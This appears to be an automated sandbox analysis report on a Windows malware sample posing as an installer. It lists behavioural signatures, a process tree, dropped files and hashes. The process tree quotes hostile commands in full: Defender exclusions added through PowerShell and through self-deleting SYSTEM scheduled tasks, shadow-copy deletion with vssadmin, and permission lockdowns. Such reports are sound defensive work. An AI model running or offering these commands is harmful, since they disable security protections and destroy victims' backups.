Analysis

  • max time kernel
    154s
  • max time network
    158s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    22/08/2026, 11:35

General

  • Target
    install_v3.0.14.exe
  • Size 31.6MB
  • Sample260822-np8chsyscv
  • SHA256 e1143c227606b52e1eb3a802a710c9c47d24d73de4dd45ee44ec3be341722fe4
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
  • Windows security bypass 2 TTPs 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 15 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 23 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies registry class 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\install_v3.0.14.exe
    "C:\Users\Admin\AppData\Local\Temp\install_v3.0.14.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3320
  • C:\Users\Public\vIqwgZ\Qbkqc7.exe
    "C:\Users\Public\vIqwgZ\Qbkqc7.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:1164
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\vIqwgZ\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:5632
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\vIqwgZ\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3504
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:1744
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:1364
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:2568
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:6032
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3020
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:5268
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:2796
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1484
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:2808
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:3852
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:3636
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:5892
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:4232
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:4444
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:5788
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2128
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:5940
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:1776
                        • C:\Program Files (x86)\QqZpRT\QqZpRT.exe
                          "C:\Program Files (x86)\QqZpRT\QqZpRT.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4420
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4748
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4700
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT" /inheritance:r
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1744
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1564
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4404
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:5480
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:5616
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:6032
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1484
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1132
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\QqZpRT.exe" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3600
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\QqZpRT.exe" /inheritance:r
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3312
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\QqZpRT.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:996
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\QqZpRT.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4560
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\QqZpRT.exe" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2824
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\QqZpRT.exe" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5268
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\image.png" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2072
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\image.png" /inheritance:r
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3568
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2216
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2036
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\image.png" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2136
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\image.png" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2768
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\thumbs.db" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:5188
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\thumbs.db" /inheritance:r
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1180
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1792
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5584
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2736
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2076
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\XPSPLOG.dll" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3384
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\XPSPLOG.dll" /inheritance:r
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2756
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2008
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5604
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QqZpRT\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2404
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QqZpRT\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1944
                      • C:\Users\Public\vIqwgZ\Qbkqc7.exe
                        "C:\Users\Public\vIqwgZ\Qbkqc7.exe"
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1424
                      • C:\Windows\system32\cmd.exe
                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\vIqwgZ" /t REG_DWORD /d 0 /f
                        1⤵
                        • Executes a command shell one-liner
                        • Suspicious use of WriteProcessMemory
                        PID:2940
                        • C:\Windows\System32\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\vIqwgZ" /t REG_DWORD /d 0 /f
                          2⤵
                          • Windows security bypass
                          PID:4792
                      • C:\Windows\system32\cmd.exe
                        cmd.exe
                        1⤵
                          PID:3976
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:3736
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:1252
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:2432
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:716
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:2272
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:1952
                        • C:\Program Files (x86)\QqZpRT\QqZpRT.exe
                          "C:\Program Files (x86)\QqZpRT\QqZpRT.exe"
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:5112
                        • C:\Program Files (x86)\QqZpRT\QqZpRT.exe
                          "C:\Program Files (x86)\QqZpRT\QqZpRT.exe"
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:4876
                        • C:\Program Files (x86)\3f3NLD5b\xI0bsG.exe
                          "C:\Program Files (x86)\3f3NLD5b\xI0bsG.exe"
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:3000
                        • C:\Program Files (x86)\3f3NLD5b\xI0bsG.exe
                          "C:\Program Files (x86)\3f3NLD5b\xI0bsG.exe"
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:1488
                        • C:\Program Files (x86)\QqZpRT\QqZpRT.exe
                          "C:\Program Files (x86)\QqZpRT\QqZpRT.exe"
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:1268
                        • C:\ProgramData\xMEnIMbo.exe
                          "C:\ProgramData\xMEnIMbo.exe"
                          1⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3008
                        • C:\ProgramData\H6rda6ny\NFGJSk2B.exe
                          "C:\ProgramData\H6rda6ny\NFGJSk2B.exe"
                          1⤵
                          • UAC bypass
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Modifies registry class
                          • System policy modification
                          PID:2708
                        • C:\ProgramData\q6H1R6VJ\Pzy39Bs0.exe
                          "C:\ProgramData\q6H1R6VJ\Pzy39Bs0.exe" 1776
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1700

                        Network

                              MITRE ATT&CK Enterprise v16

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              XPSPLOG.dll

                              • Path C:\Program Files (x86)\3f3NLD5b\XPSPLOG.dll
                              • Size 4.6MB
                              • SHA256 9517feab306a73e45f73dc1114d8ed0e142e677daadb719044b695d593e00209
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              image.png

                              • Path C:\Program Files (x86)\3f3NLD5b\image.png
                              • Size 5.0MB
                              • SHA256 3039db95a196c2c9e9b2300c3092002b59c8d45a15a1ffcd79c7ba3c8b1bd3b6
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              QqZpRT.exe

                              • Path C:\Program Files (x86)\QqZpRT\QqZpRT.exe
                              • Size 145KB
                              • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              XPSPLOG.dll

                              • Path C:\Program Files (x86)\QqZpRT\XPSPLOG.dll
                              • Size 4.6MB
                              • SHA256 f1da94a88228a6b70a87296b0836fa78d5bb59c2bd45ae6447bf2e4db1940130
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              image.png

                              • Path C:\Program Files (x86)\QqZpRT\image.png
                              • Size 5.0MB
                              • SHA256 b309103250704d6f75859465ef7406d35454bd6a2d106eb4f0f944b85af77542
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              thumbs.db

                              • Path C:\Program Files (x86)\QqZpRT\thumbs.db
                              • Size 358KB
                              • SHA256 2467b6b41c3b00096c0678bbfa39c8b0711f7648caf60afc0b12076f5bea6665
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              NFGJSk2B.exe

                              • Path C:\ProgramData\H6rda6ny\NFGJSk2B.exe
                              • Size 475KB
                              • SHA256 43f3fcab87e50de0572ac20a0d579dd0fe2be39c0584b4b39557ea9c064016b0
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              xMEnIMbo.exe

                              • Path C:\ProgramData\xMEnIMbo.exe
                              • Size 2.8MB
                              • SHA256 84c25be3b2d6a7ff2ad7bad8ace1db6c3f98feae88bcfc221b622655fc565f90
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B

                              • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B
                              • Size 1KB
                              • SHA256 b783b8e2ab4d49bd62308caed253ca87bcdf00c493e3b809af06672762d84e0b
                              • MD5 SHA1 SHA512 TLSH

                              B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240

                              • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240
                              • Size 1KB
                              • SHA256 6218d19e5fcbc0c1a249f82a46ff7302cf12d5cd58533669616709b8ffdf3721
                              • MD5 SHA1 SHA512 TLSH

                              0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B

                              • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B
                              • Size 508B
                              • SHA256 300bd393088105654de713eba8c3eb590018358550ec0fea7bb03070cb148685
                              • MD5 SHA1 SHA512 TLSH

                              B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240

                              • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240
                              • Size 510B
                              • SHA256 553910c7adaafe11b985a51a69124c1e7a3c083c53d83e87cfda4990067ce54e
                              • MD5 SHA1 SHA512 TLSH

                              destopbak.ini

                              • Path C:\Users\Public\Music\destopbak.ini
                              • Size 2B
                              • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                              • MD5 SHA1 SHA512

                              Qbkqc7.exe

                              • Path C:\Users\Public\vIqwgZ\Qbkqc7.exe
                              • Size 135KB
                              • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              UxEnhance64.dll

                              • Path C:\Users\Public\vIqwgZ\UxEnhance64.dll
                              • Size 3.1MB
                              • SHA256 cab712d991431d4547729e8473a03cbe7ec7b3069c2922893728cfa041315a48
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              adoresd.dat

                              • Path C:\Users\Public\vIqwgZ\adoresd.dat
                              • Size 4.7MB
                              • SHA256 0691d9158adb5991ee71d80b7d38b62fb0d9a764e8f7a6452ea0154333c64887
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              msadox.tb

                              • Path C:\Users\Public\vIqwgZ\msadox.tb
                              • Size 8KB
                              • SHA256 0fcaf56a72eabe968ee9601bfb14348a6915ef070095da776b136b6cf61c0a73
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              xxxx.ini

                              • Path \??\c:\xxxx.ini
                              • Size 2B
                              • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                              • MD5 SHA1 SHA512

                              memory/1164-605-0x00000282F2900000-0x00000282F291E000-memory.dmp

                              memory/1164-599-0x00000282F28B0000-0x00000282F28D2000-memory.dmp

                              memory/1164-607-0x00000282F2920000-0x00000282F292A000-memory.dmp

                              memory/1164-606-0x00000282F2B90000-0x00000282F2C42000-memory.dmp

                              memory/1268-797-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

                              memory/1268-798-0x0000000074E20000-0x000000007556A000-memory.dmp

                              memory/1268-803-0x00000000033B0000-0x0000000003BB3000-memory.dmp

                              memory/1424-583-0x0000024354ED0000-0x0000024355757000-memory.dmp

                              memory/1424-584-0x0000024354ED0000-0x0000024355757000-memory.dmp

                              memory/1424-572-0x00007FF9A5AB0000-0x00007FF9A5FCE000-memory.dmp

